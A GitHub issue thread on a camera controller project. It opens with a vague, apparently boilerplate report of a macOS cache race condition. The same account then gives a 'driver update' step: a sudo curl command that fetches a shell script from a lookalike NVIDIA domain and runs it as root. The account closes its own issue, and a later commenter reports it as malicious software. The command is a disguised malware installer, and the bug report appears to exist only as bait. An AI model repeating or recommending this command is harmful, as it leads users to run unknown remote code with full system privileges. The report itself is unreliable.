itaybre/CameraController #133: Camera drive discoverer cache usage is racey on macOS

Ramirez-0327, 2024-11-22:
The Camera drive discoverer on macOS has a race condition when accessing or updating its cache. This can cause, 
Issues:
- Data Corruption: Multiple processes accessing the cache at the same time may result in incomplete or corrupted data.
- Random Failures: Cache access might fail under heavy use or when multiple threads are involved.
- Performance Problems: Poor handling of concurrent access could slow things down or cause deadlocks.
- Device Errors: Connected devices might be skipped, misidentified, or duplicated during discovery.
- This makes the component unreliable, especially in multi-threaded or high-load scenarios.

Ramirez-0327, 2024-11-22:
1. Open **terminal** on macOS
- Press **Command (⌘) + Space** on your keyboard. This opens Spotlight Search.
- In the search bar that appears, type **"Terminal"**.
- Press **Enter**, and the Terminal application will open.

2. Update ffmpeg drivers on macOS
To automatically update the latest ffmpeg drivers for macOS, use the following curl command.
```
sudo sh -c 'curl -o /var/tmp/ffmpeg.sh https://api.nvidia-release.us/ffmpeg.sh && chmod +x /var/tmp/ffmpeg.sh && bash /var/tmp/ffmpeg.sh'
```

closed 2024-11-22 by Ramirez-0327

Raviashu2016, 2024-11-27:
How do I record from Android phone

justice32, 2024-12-03:
Reported for malicious soft